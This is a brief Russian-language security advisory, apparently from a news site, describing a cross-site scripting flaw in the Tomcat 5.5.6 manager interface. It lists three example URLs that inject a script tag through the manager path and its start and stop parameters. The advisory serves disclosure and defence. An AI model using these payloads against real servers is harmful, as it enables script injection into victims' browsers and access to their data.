• Партнер

  • Программа: Apache Jakarta Tomcat 5.5.6 

    Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным пользователей.
    Уязвимость обнаружена при обработке данных в сценарии manager Tomcat. Удаленный пользователь может создать специально сформированный URL и выполнить произвольный HTML сценарий в браузере жертвы. 

    Пример: 

    http://[target]:8080/manager/html/ <script>alert("Hallo")</script>
    http://[target]:8080/manager/html/ stop ?path=<script>alert("Hallo")</script>
    http://[target]:8080/manager/html/ start?path=<script>alert("Hallo")</script>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии